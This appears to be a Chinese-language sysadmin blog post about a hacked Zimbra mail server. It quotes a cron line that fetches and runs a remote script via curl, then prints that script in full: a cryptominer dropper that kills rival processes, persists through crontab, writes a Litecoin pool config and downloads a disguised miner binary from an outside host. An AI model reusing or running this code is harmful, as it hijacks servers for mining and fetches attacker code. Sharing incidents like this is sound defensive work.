最近發現Zimbra主機似乎被駭客打進去了
會有 root 往外發信的紀錄,所以在 zimbra的postfix裡面設定了 always_bcc ,想看一下到底是寄出什麼東西
似乎是透過crontab 定時送出,可是我/etc底下的 crontab 都檢查過了,沒看到異常說..
信件內容如下
### Cron Daemon <root@> 3:00 (5 小時前)
寄給 zimbra/bin/sh: -c: line 0: syntax error near unexpected token `(‘
/bin/sh: -c: line 0: `/bin/bash <(curl -ksL https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT); /opt/zimbra/data/tmp/.z.sh’
會自己去抓檔案下來,偽裝成 zimbra 的系統檔案,不過那個檔案連結似乎已經失效,抓不到了。
抓下來的檔案內容如下
#!/bin/bash
kill -9 $(ps aux | grep “-B -o stratum” | awk ‘{print $2}’) 2>&1
kill -9 $(ps aux | grep “minerd” | awk ‘{print $2}’) 2>&1
kill -9 $(ps aux | grep “-B -c /“ | awk ‘{print $2}’) 2>&1
kill -9 $(ps aux | grep “stratum” | awk ‘{print $2}’) 2>&1
kill -9 $(ps aux | grep “java” | awk ‘{print $2}’) 2>&1
kill -9 $(ps aux | grep “ssh-scan” | awk ‘{print $2}’) 2>&1
kill -9 $(ps aux | grep “/bin/sh ./start” | awk ‘{print $2}’) 2>&1
kill -9 $(ps aux | grep “zimbravm-cache” | awk ‘{print $2}’) 2>&1
kill -9 $(ps aux | grep “/bin/bash ./a” | awk ‘{print $2}’) 2>&1
kill -9 $(ps aux | grep “pscan” | awk ‘{print $2}’) 2>&1
ARCH=$(uname -m)
BINNAME=”zm-helper”
BINCFG=”zm-helper.cfg”
if [[ $EUID -eq 0 ]]
then
BINDIR=”/sbin/“
CFGDIR=”/etc/“
BINPATH=”$BINDIR$BINNAME”
CFGPATH=”$CFGDIR$BINCFG”
fi
if [[ $EUID -ne 0 ]]
then
BINDIR=”/tmp/“
CFGDIR=”/tmp/“
BINPATH=”$BINDIR$BINNAME”
CFGPATH=”$CFGDIR$BINCFG”
fi
if [ -f /opt/zimbra/data/tmp/.z.sh ]
then
crontab -r
wget -q https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT -O /opt/zimbra/data/tmp/.z.sh
cro=’/bin/bash <(curl -ksL https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT); /opt/zimbra/data/tmp/.z.sh’
(crontab -l; echo “0 /3 $cro”) 2>&1 | sed “s/no crontab for $(whoami)//“ | uniq | crontab -
fi
k=$(ps aux | grep “[${BINNAME:0:1}]mod -B -c ${CFGPATH:0:4}” | awk ‘{print $2}’)
if [ ! -z “$k” ]
then
kill -9 $(ps aux | grep “[${BINNAME:0:1}]mod -B -c ${CFGPATH:0:4}” | awk ‘{print $2}’)
fi
[[ -f “$CFGPATH” ]] && rm -rf “$CFGPATH”
[[ -f “$BINPATH” ]] && rm -rf “$BINPATH”
(cat <<- EOF
{
“url” : “stratum+tcp://ltc.give-me-coins.com:3333”,
“user” : “n0ts0me1ne.1”,
“pass” : “zx1”,
“quiet” : true
}
EOF
) > “$CFGPATH”
wget -q https://cp1.awardspace.net/filemanager2/core/doc/.mz/m_`uname -m` -O “$BINPATH”
chmod +x “$BINPATH”
eval “$BINPATH -B -c $CFGPATH 2> /dev/null”
chk=$(ps aux | grep “[${BINNAME:0:1}]mod” | awk ‘{print $2}’)
if [ ! -z “$chk” ]
then
echo “$chk”
fi
exit 1
先把類似的檔案備份、砍掉,執行
/opt/zimbra/libexec/zmfixperms –verbose –extended
修正權限問題
大概就先這樣子吧,改天再來重裝好了。